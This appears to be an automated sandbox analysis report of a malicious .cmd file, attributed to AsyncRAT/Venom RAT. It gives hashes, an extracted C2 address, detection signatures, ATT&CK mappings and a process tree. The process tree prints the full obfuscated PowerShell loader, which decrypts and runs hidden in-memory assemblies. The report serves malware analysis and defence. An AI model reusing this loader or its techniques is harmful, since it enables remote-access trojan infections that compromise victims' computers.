Analysis

  • max time kernel
    135s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 01:42

General

  • Target

    c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd

  • Size

    82KB

  • MD5

    0c9dd4a4644d5271be6bf540daccb191

  • SHA1

    452415383fd54926ce19f8f78258dc57d87c98ef

  • SHA256

    c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0

  • SHA512

    194d82615358dfc579e508768e2b2e3357069ea626cf90415f58459943a147e0c58d600091bf8840c1e06db9962ca01b3cd2cf9f1ee3d6685bd8d62a6219eab5

  • SSDEEP

    1536:cHkGj8vp9NrhTu1iCrjNk9CRsphfkA0tNJxCK9dLbw3/4cLT4H/INmxklg:cHB8nrhTu1L8CRsp+RtIK4v3nUcM

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

undjsj.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Detects executables attemping to enumerate video devices using WMI 1 IoCs
  • Detects executables packed with ConfuserEx Mod 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:1648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:3384
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c993fe19772483493944a04b83c5842049b2ddf5f4f2289f7ecd67d1245658e0.cmd';$pbWn='CCiQDreCiQDatCiQDeCiQDDeCiQDcCiQDryCiQDptCiQDoCiQDrCiQD'.Replace('CiQD', ''),'ReaxqAidLxqAiinxqAiesxqAi'.Replace('xqAi', ''),'InQyKRvokQyKReQyKR'.Replace('QyKR', ''),'SplnwOxitnwOx'.Replace('nwOx', ''),'TwpaoranwpaosfowpaormFwpaoinawpaolBwpaolwpaoocwpaokwpao'.Replace('wpao', ''),'MHTmMainHTmMModHTmMuleHTmM'.Replace('HTmM', ''),'DjIQtejIQtcomjIQtprjIQtesjIQtsjIQt'.Replace('jIQt', ''),'GXkOEetXkOECuXkOErrXkOEenXkOEtPXkOErocXkOEeXkOEssXkOE'.Replace('XkOE', ''),'CopSQYnyTSQYnoSQYn'.Replace('SQYn', ''),'EnPEgatrPEgayPoPEgainPEgatPEga'.Replace('PEga', ''),'ElmTJxemmTJxenmTJxtAtmTJx'.Replace('mTJx', ''),'FrqclComqclCBqclCaseqclC64qclCStqclCrinqclCgqclC'.Replace('qclC', ''),'ChraKjanraKjgeraKjExraKjtenraKjsraKjioraKjnraKj'.Replace('raKj', ''),'LwzKkoawzKkdwzKk'.Replace('wzKk', '');powershell -w hidden;function YbNek($AfeKW){$JkaZj=[System.Security.Cryptography.Aes]::Create();$JkaZj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$JkaZj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$JkaZj.Key=[System.Convert]::($pbWn[11])('V0mh2MCToA3bNgC8EKO2KMAaZFb3l+ctJ6Wraknusvw=');$JkaZj.IV=[System.Convert]::($pbWn[11])('prJfwam6dZ/6yyv50tuZSA==');$fCuEB=$JkaZj.($pbWn[0])();$kBOHP=$fCuEB.($pbWn[4])($AfeKW,0,$AfeKW.Length);$fCuEB.Dispose();$JkaZj.Dispose();$kBOHP;}function hgyps($AfeKW){$ALoua=New-Object System.IO.MemoryStream(,$AfeKW);$GsRzp=New-Object System.IO.MemoryStream;$WrauX=New-Object System.IO.Compression.GZipStream($ALoua,[IO.Compression.CompressionMode]::($pbWn[6]));$WrauX.($pbWn[8])($GsRzp);$WrauX.Dispose();$ALoua.Dispose();$GsRzp.Dispose();$GsRzp.ToArray();}$dfSrb=[System.IO.File]::($pbWn[1])([Console]::Title);$CHSWN=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 5).Substring(2))));$UqEWf=hgyps (YbNek ([Convert]::($pbWn[11])([System.Linq.Enumerable]::($pbWn[10])($dfSrb, 6).Substring(2))));[System.Reflection.Assembly]::($pbWn[13])([byte[]]$UqEWf).($pbWn[9]).($pbWn[2])($null,$null);[System.Reflection.Assembly]::($pbWn[13])([byte[]]$CHSWN).($pbWn[9]).($pbWn[2])($null,$null); "
            3⤵
              PID:1716
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
              3⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3516
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1140

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phvh31of.mbi.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3516-14-0x0000024AECF70000-0x0000024AECFE6000-memory.dmp
          Filesize

          472KB

        • memory/3516-27-0x00007FF8626F0000-0x00007FF8628E5000-memory.dmp
          Filesize

          2.0MB

        • memory/3516-11-0x00007FF844740000-0x00007FF845201000-memory.dmp
          Filesize

          10.8MB

        • memory/3516-12-0x00007FF844740000-0x00007FF845201000-memory.dmp
          Filesize

          10.8MB

        • memory/3516-13-0x0000024AECEA0000-0x0000024AECEE4000-memory.dmp
          Filesize

          272KB

        • memory/3516-0-0x00007FF844743000-0x00007FF844745000-memory.dmp
          Filesize

          8KB

        • memory/3516-26-0x0000024AD40E0000-0x0000024AD40F2000-memory.dmp
          Filesize

          72KB

        • memory/3516-1-0x0000024AD3EE0000-0x0000024AD3F02000-memory.dmp
          Filesize

          136KB

        • memory/3516-29-0x0000024AD40F0000-0x0000024AD4100000-memory.dmp
          Filesize

          64KB

        • memory/3516-28-0x00007FF8613B0000-0x00007FF86146E000-memory.dmp
          Filesize

          760KB

        • memory/3516-30-0x0000024AD4100000-0x0000024AD4116000-memory.dmp
          Filesize

          88KB

        • memory/3516-34-0x00007FF844740000-0x00007FF845201000-memory.dmp
          Filesize

          10.8MB

        • memory/3516-35-0x00007FF844743000-0x00007FF844745000-memory.dmp
          Filesize

          8KB

        • memory/3516-36-0x00007FF844740000-0x00007FF845201000-memory.dmp
          Filesize

          10.8MB